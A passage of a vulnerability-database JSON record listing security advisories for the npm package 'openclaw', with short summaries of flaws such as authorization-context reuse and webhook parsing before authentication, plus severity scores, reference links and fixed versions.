"scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T17:25:18Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wppj-c6mr-83jj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44112", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44112" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-symlink-swap-race-condition-in-openshell-fs-bridge-writes", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T17:25:18Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-symlink-swap-race-condition-in-openshell-fs-bridge-writes" }, { "reference_url": "https://github.com/advisories/GHSA-wppj-c6mr-83jj", "reference_id": "GHSA-wppj-c6mr-83jj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wppj-c6mr-83jj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api", "purl": "pkg:npm/openclaw@2026.4.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22" } ], "aliases": [ "CVE-2026-44112", "GHSA-wppj-c6mr-83jj" ], "risk_score": 4.3, "exploitability": "0.5", "weighted_severity": "8.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t2ve-xemk-mqa9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89045?format=api", "vulnerability_id": "VCID-t2yy-9ume-t7be", "summary": "OpenClaw: Collect-mode queue batches could reuse the last sender authorization context\n## Summary\n\nCollect-mode queue batches could reuse the last sender authorization context.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nCollect-mode queued messages from different senders could be drained as one batch using the final sender's authorization context, allowing earlier messages to inherit a more privileged context.\n\n## Technical Details\n\nThe fix splits collect-mode batches by sender authorization context before dispatch, preserving each message's own trust state.\n\n## Fix\n\nThe issue was fixed in #66024. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `43d4be902755c970b3d15608679761877718da69`\n- PR: #66024\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43535", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07719", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08979", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08998", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43535" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/43d4be902755c970b3d15608679761877718da69", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T12:07:14Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/43d4be902755c970b3d15608679761877718da69" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/66024", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/66024" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jwrq-8g5x-5fhm", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T12:07:14Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jwrq-8g5x-5fhm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43535", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43535" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-context-reuse-in-collect-mode-queue-batches", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T12:07:14Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authorization-context-reuse-in-collect-mode-queue-batches" }, { "reference_url": "https://github.com/advisories/GHSA-jwrq-8g5x-5fhm", "reference_id": "GHSA-jwrq-8g5x-5fhm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jwrq-8g5x-5fhm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109967?format=api", "purl": "pkg:npm/openclaw@2026.4.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14" } ], "aliases": [ "CVE-2026-43535", "GHSA-jwrq-8g5x-5fhm" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t2yy-9ume-t7be" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89218?format=api", "vulnerability_id": "VCID-t991-75e7-ykdv", "summary": "OpenClaw: MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion\n## Summary\nMS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still parses Teams JSON after only a Bearer-prefix gate and before real JWT validation, and the auth-before-parse fix is not yet shipped.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `3834d47099dd13c8244ed6de8b9ea9855c553623` — 2026-03-30T13:46:40+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41405", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00228", "scoring_system": "epss", "scoring_elements": "0.45732", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00228", "scoring_system": "epss", "scoring_elements": "0.45716", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00228", "scoring_system": "epss", "scoring_elements": "0.45736", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41405" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/3834d47099dd13c8244ed6de8b9ea9855c553623", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/3834d47099dd13c8244ed6de8b9ea9855c553623" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-p464-m8x6-vhv8", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-p464-m8x6-vhv8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41405", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41405" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-ms-teams-webhook-body-parsing", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-ms-teams-webhook-body-parsing" }, { "reference_url": "https://github.com/advisories/GHSA-p464-m8x6-vhv8", "reference_id": "GHSA-p464-m8x6-vhv8", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p464-m8x6-vhv8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41405", "GHSA-p464-m8x6-vhv8" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t991-75e7-ykdv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89742?format=api", "vulnerability_id": "VCID-te8f-snty-j7hh", "summary": "Duplicate Advisory: OpenClaw: Feishu webhook reads and parses unauthenticated request bodies before signature validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-3h52-cx59-c456. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.25 parses JSON request bodies before validating webhook signatures, allowing unauthenticated attackers to force resource-intensive parsing operations. Remote attackers can send malicious webhook requests to trigger denial of service by exhausting server resources through forced JSON parsing before signature rejection.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35640", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35640" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing" }, { "reference_url": "https://github.com/advisories/GHSA-8f9r-gr6r-x63q", "reference_id": "GHSA-8f9r-gr6r-x63q", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8f9r-gr6r-x63q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": 